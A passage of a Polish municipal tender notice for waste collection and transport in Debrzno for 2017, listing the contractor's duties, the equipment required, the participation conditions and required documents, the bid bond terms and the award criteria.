d) odpadowa papę odbierane są przez Wykonawcę z punktów selektywnej zbiórki odpadów komunalnych w terminach i z miejsc wyznaczonym przez Zamawiającego.

- odpady z remontów prowadzonych we własnym zakresie od nieruchomość zamieszkałych (kody 170107, 170904, 170101, 170102, 170103). Wykonawca jest zobowiązany do dostarczania kontenera na odpady budowlane i rozbiórkowe lub worka na gruz o pojemności 500 l na zlecenie Zamawiającego, w dniu następnym po otrzymaniu zlecenia. W ramach zlecenia Wykonawca zobowiązany jest dostarczyć pojemnik, a następnie go odebrać i przekazać odpady do recyklingu lub ponownego użycia. Usługa jest realizowana każdorazowo na zlecenie właściciela nieruchomości i na jego koszt.
Do obowiązków Wykonawcy należy również odbiór przeterminowanych leków (kod 20 01 32) z aptek usytuowanych na terenie miasta Debrzno:
* Apteka Nowa s. c. A. Szurik, Z. Szurik  Iwicka, M. Szurik  Paprota apteka ogólnodostępna NOWA, ul. T. Kościuszki 3-5, Debrzno.
* Apteka PS Pharm (Apteka w Polo Markecie), ul. Przechodnia 9, Debrzno.
Odbiór ma się odbywać co kwartał, a także po zgłoszeniu o wypełnieniu pojemnika. Wykonawca zapewnia pojemniki do gromadzenia przeterminowanych leków o pojemności co najmniej 60 l. Zamawiający zapewnia sobie możliwość zwiększania ilości punktów wyposażonych w pojemniki do zbiórki przeterminowanych leków w razie zwiększania się potrzeb gminy w tym zakresie.

Do obowiązków Wykonawcy należy odbiór odpadów komunalnych, na których znajdują się domki letniskowe lub inne nieruchomości wykorzystywane na cele rekreacyjno-wypoczynkowe, wykorzystywane jedynie przez część roku. Przy czym odbiór będzie odbywał się na podstawie harmonogramu ustalonego z Zamawiającym.

Wykonawca jest zobowiązany do odbioru w dni powszednie zgodnie z harmonogramem. Odbiór odpadów komunalnych nie może następować w niedziele oraz w dni ustawowo wolne od pracy. W przypadku, gdy dzień odbioru zgodnie z harmonogramem przypada na dzień ustawowo wolny od pracy, dniem odbioru odpadów jest ostatni dzień roboczy przed dniem wolnym.

POZOSTAŁE OBOWIĄZKI

A) Obowiązkiem Wykonawcy będzie uzupełnienie na własny koszt worków do selektywnych odpadów, poprzez pozostawienie w miejscu odbioru zapełnionych worków, nowymi pustymi w dniu odbioru selektywnie zbieranych.
B) Obowiązkiem Wykonawcy będzie dostarczenie co najmniej raz w miesiącu po 100 szt. worków żółtych i szarych/grafitowych, oraz 100 szt. worków zielonych i brązowych  jako rezerwa do Urzędu Miasta i Gminy w Debrznie.
C) Obowiązkiem Wykonawcy będzie dostarczenie worków na targowisko miejskie w Debrznie w ilości ok. 50 szt. 60 l i 10 szt. 120 l na miesiąc.
D) Obowiązkiem Wykonawcy będzie wyposażenie wszystkich nieruchomości zamieszkałych i niezamieszkałych objętych zbiórką w worki oraz pojemniki niezbędne do gromadzenia odpadów, przed pierwszym dniem obowiązywania umowy na odbiór i transport odpadów zawartej z Zamawiającym, tj. dostarcza pojemniki na odpady zmieszane i selektywnie zebrane oraz wszystkie rodzaje worków.
E) Na potwierdzenie dostarczenia worków oraz pojemników Wykonawca powinien posiadać potwierdzenie od właściciela (-li) nieruchomości.
F) Wykonawca ma obowiązek dostarczania każdemu właścicielowi nieruchomości harmonogramu odbioru odpadów na cały rok kalendarzowy.
G) Wykonawca ma obowiązek na własny koszt wyposażenia zabudowy wielorodzinnej w pojemniki do selektywnej zbiórki odpadów o pojemności nie mniejszej niż 1100 l, z następującymi oznaczeniami:
- pojemnik - kolor żółty z napisem PAPIER, METALE, TWORZYWA SZTUCZNE, OPAKOWANIA  WIELOMATERIAŁOWE;
- pojemnik - kolor zielony z napisem SZKŁO;
- pojemnik  kolor brązowy z napisem ODPADY ZIELONE;
- pojemnik  kolor szary/ grafitowy z napisem POPIÓŁ.
H) Wykaz urządzeń do gromadzenia odpadów zmieszanych:
a) pojemniki:
- pojemnik 110 l, 120 l  ok. 2200 szt,
- pojemnik 240 l  ok. 960 szt,
- pojemnik 1100 l  ok. 230 szt.
 b) worki do segregacji odpadów:
- worek żółty z napisem PAPIER, METALE, TWORZYWA SZTUCZNE, OPAKOWANIA  WIELOMATERIAŁOWE- ok. 90 000 szt.
- worek zielony z napisem SZKŁO  ok. 43 000 szt.
- worek brązowy z napisem ODPADY ZIELONE- ok. 30 000 szt.
- worek szary/grafitowy z napisem POPIÓŁ  ok. 40 000 szt.
c) pojemniki:
- pojemnik - kolor żółty (minimum 1100 l) z napisem PAPIER, METALE, TWORZYWA SZTUCZNE, OPAKOWANIA  WIELOMATERIAŁOWE  ok. 60 szt.,
- pojemnik - kolor zielony (minimum 1100 l) z napisem SZKŁO  ok. 60 szt.,
- pojemnik  kolor brązowy (minimum 1100 l) z napisem ODPADY ZIELONE  ok. 60 szt.
- pojemnik  kolor szary/ grafitowy (minimum 1100 l) z napisem POPIÓŁ  ok/ 20 szt.
I) Wykonawca ma obowiązek wyposażenia właścicieli nieruchomości zamieszkałych (oprócz Wspólnot Mieszkaniowych) w worki do zbiórki odpadów segregowanych następujących rodzajów worków:
- worek żółty wykonany z tworzywa LDPE o pojemności 120 l i grubości nie mniejszej niż 60 mikronów z oznaczeniem  PAPIER, METALE, TWORZYWA SZTUCZNE, OPAKOWANIA  WIELOMATERIAŁOWE,
- worek zielony wykonany z tworzywa LDPE o pojemności 120 l i grubości nie mniejszej niż 70 mikronów z oznaczeniem SZKŁO,
- worek brązowy wykonany z tworzywa LDPE o pojemności 120 l i grubości nie mniejszej niż 70 mikronów z oznaczeniem ODPADY ZIELONE,
- worek szary/grafitowy wykonany z tworzywa LDPE o pojemności 60 l i grubości nie mniejszej niż 90 mikronów z oznaczeniem POPIÓŁ.
J) Obowiązkiem Wykonawcy w trakcie wykonywania umowy jest wyposażenie zgłoszonych przez Zamawiającego miejsc gromadzenia odpadów w niezbędne pojemniki i worki następuje najpóźniej w ciągu 10 dni roboczych.
K) Obowiązkiem Wykonawcy będzie przedłożenie Zamawiającemu wraz z fakturą następujących dokumentów za miesiąc rozliczeniowy dowodów przekazania odebranych odpadów komunalnych oraz wykazu nieruchomości (wersja papierowa i elektroniczna) zobowiązanych do selektywnej zbiórki odpadów, a nie przeprowadzających jej (niesegregujących odpady) oraz sprawozdania z miejsc odbioru worków z odpadami niesegregowanymi (zmieszanymi) dostawianych do pojemników przeznaczonych na tego rodzaju odpady (adres i liczba dostawionych worków).
L) Wykonawca jest zobowiązany do kontroli zawartości pojemników i worków w celu określenia prawidłowości posegregowania odpadów. W przypadku stwierdzenia nieprawidłowej segregacji Wykonawca zobowiązany jest, po udokumentowaniu, do niezwłocznego powiadomienia o zaistniałym fakcie Gminę i właściciela nieruchomość. Odebranie odpadów jest potwierdzeniem prawidłowej segregacji.

Sprzęt techniczny
- pojazd przystosowany do obioru odpadów zmieszanych o masie całkowitej powyżej 3,5 t  4 szt., w tym 2 pojazdy o emisji spalin euro 4,
- pojazd przystosowany do obioru odpadów segregowanych o masie całkowitej powyżej 3,5 t 1 szt.,
- pojazd przystosowany do obioru odpadów segregowanych o masie całkowitej do 3,5 t 1 szt.,
- dysponowanie jednostką do mycia pojemników na odpady o biegu zamkniętym.,
- system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postoju,
- system czujników zapisujących dane o miejscach wyładunku odpadów, umożliwiających weryfikację tych danych,
- narzędzia, urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników na odpady,
pojazd przystosowany do zbiórki odpadów wielkogabarytowych, sprzętu elektrycznego i elektronicznego bez funkcji kompaktującej.
<br /><br /><b>II.5) Główny kod CPV: </b>90500000-2<br /><b> Dodatkowe kody CPV:</b>90514000-3,
                90511000-2,
                90512000-9,
                90513100-7,
                90533000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje możliwość udzielenia dotychczasowemu Wykonawcy udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt 6 ustawy PZP, w kwocie nie przekraczającej 20 % wartości zamówienia podstawowego a polegających na powtórzeniu podobnych usług zgodnych z przedmiotem za-mówienia podstawowego. <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/01/2017
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że posiada:
a) zezwolenie na transport odpadów w zakresie objętym przedmiotem niniejszego zamówienia zgodnie z obowiązującymi przepisami prawa; 
b) wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na terenie Miasta i Gminy Debrzno, prowadzonego na podstawie art. 9c ust. 1 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2016  r. poz. 250 ze zm.). 
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże że: 
a) posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 500.000,00 zł 
b) posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 100.000,00 zł (sto tysięcy złotych)
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje następującymi narzędziami i urządzeniami:
- bazą magazynowo-transportową usytuowaną w odległości nie większej niż 60 km od granicy Miasta i Gminy Debrzno, na terenie, do którego posiada tytuł prawny,
- pojazd przystosowany do obioru odpadów zmieszanych o masie całkowitej powyżej 3,5 t  4 szt., w tym 2 pojazdy o emisji spalin euro 4,
- pojazd przystosowany do obioru odpadów segregowanych o masie całkowitej powyżej 3,5 t 1 szt.,
- pojazd przystosowany do obioru odpadów segregowanych o masie całkowitej do 3,5 t 1 szt.,
- dysponowanie jednostką do mycia pojemników na odpady o biegu zamkniętym.,
- system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postoju,
- narzędzia, urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników na odpady,
- pojazd przystosowany do zbiórki odpadów wielkogabarytowych, sprzętu elektrycznego i elektronicznego bez funkcji kompaktującej.
Wykonawca zobowiązany jest zapewnić, aby pojazdy przeznaczone do odbierania                      i transportu  odpadów były we właściwym stanie technicznym, oznaczone trwale i czytelnie, w widocznym miejscu, nazwą firmy oraz danymi adresowymi i numerem telefonu Wykonawcy  oraz zapewnić  w zakresie  wyposażenia pojazdów  aby:
- konstrukcja pojazdów zabezpieczała przed rozwiewaniem i rozpylaniem przewożonych odpadów oraz minimalizowała oddziaływanie czynników atmosferycznych na odpady;
- pojazdy były wyposażone w system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów, 
- pojazdy były wyposażone w czujniki zapisujące dane o miejscach wyładunku odpadów umożliwiające weryfikację tych danych;
- pojazdy były wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników. 

Posiadania zdolności zawodowych:
Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) należycie, w okresie ostatnich trzech lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie - usługi odbioru odpadów komunalnych zmieszanych z terenu nieruchomości i ich transport w ilości co najmniej 1400 Mg oraz odpadów gromadzonych selektywnie (np., szkło, makulatura, plastik) w ilości co najmniej 100 Mg. 
Wymóg zatrudnienia osób przez wykonawcę lub podwykonawcę na podstawie umowy 
o prace: Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże że: 
a) w zakresie realizacji zamówienia czynności wykonywane przez kierowców i ładowaczy 
(tj. czynności w zakresie transportu i odbioru odpadów) są wykonywane przez osoby zatrudnione na podstawie umowy o pracę, obowiązek ten dotyczy także podwykonawców.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.Do oferty wykonawca dołącza aktualne na dzień składania ofert oświadczenie zgodnie z załącznikiem nr 2 do siwz. Informacje zawarte w oświadczeniu stanowią wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. 

Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniu.
W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.
1) oświadczenie o braku podstaw do wykluczenia zgodnie z załącznikiem nr 3 do siwz; 
2) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert ; 
3) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert1;
4) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
5) dokument potwierdzający wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na terenie Gminy Miasta i Gminy Debrzno, prowadzonego przez Burmistrza Miasta i Gminy Debrzno na podstawie art. 9c ust. 1 ustawy z dnia 13 września 1996  r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2016 r. poz. 250 ze zm.), dotyczący odpadów będących przedmiotem niniejszego zamówienia; 
6) decyzję administracyjną - zezwolenie na transport odpadów w zakresie objętym przedmiotem niniejszego zamówienia zgodnie z obowiązującymi przepisami prawa;

</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1) wykaz narzędzi i infrastruktury wraz z informacją o podstawie do dysponowania tymi zasobami zgodnie z załącznikiem nr 4 do SIWZ; 
2) wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, zgodnie z załącznikiem nr 5 do SIWZ;
3) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert;
4) dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w kwocie 500 000, 00 zł.
5) dokument potwierdzający, że czynności w zakresie transportu i odbioru odpadów wykonują osoby zatrudnione na umowę o pracę  zanonimizowane umowy o pracę.
6) harmonogram odpadów.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej:
1)	W celu potwierdzenia braku podstaw do wykluczenia wykonawcy z postępowania, o których mowa w art. 24 ust. 1 pkt 23 ustawy, wykonawca składa oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, zgodne z załącznikiem nr 6 do SIWZ; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu;
2)	Ww. oświadczenie oraz ewentualne dowody wykonawca składa w terminie 3 dni od dnia zamieszczenia przez zamawiającego na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy.

3)	W przypadku składania oferty wspólnej ww. oświadczenie składa każdy z wykonawców składających ofertę wspólną.
4. Inne dokumenty wymagane przez zamawiającego: 
1) oferta zgodnie z załącznikiem nr 1 do siwz, 
2) odpowiednie pełnomocnictwa - tylko w sytuacjach gdy są one wymagane, 
3) dowód wniesienia wadium. 
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Wysokość wadium ustala się w kwocie 10.000,00 zł.
2. Wadium wnosi się przed upływem terminu składania ofert.
3. Wadium może być wnoszone w formach określonych w art. 45 ust. 6 ustawy.
4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:
Numer konta: 23 9326 0006 0080 0091 2000 0030, Bank Spółdzielczy w Człuchowie Oddział w Debrznie.
5. Wadium wnoszone w innej formie niż w pieniądzu, określonej w art. 45 ust. 6 pkt 2-5 ustawy, musi zawierać zobowiązanie gwaranta lub poręczyciela do bezwarunkowej, na każde żądanie zgłoszone przez zamawiającego w terminie związania ofertą, wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 ustawy.
6. Wadium może być wniesione w jednej lub kilku formach.
7. Wykonawca, który nie zabezpieczy swojej oferty akceptowaną formą wadium zostanie przez zamawiającego wykluczony, a jego oferta zostanie uznana za odrzuconą.
8. W ofercie należy wpisać nr konta, na które zamawiający ma zwrócić wadium lub dołączyć do oferty upoważnienie do odbioru wadium przez wskazaną osobę.
9. Zatrzymanie wadium nastąpi w okolicznościach, jeżeli:
a)	wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy, oświadczenia, o którym mowa w art. 25a ust. 1 ustawy, pełnomocnictw lub nie wyraził zgody na poprawie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej,
b)	wykonawca odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
c)	wykonawca nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
d)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
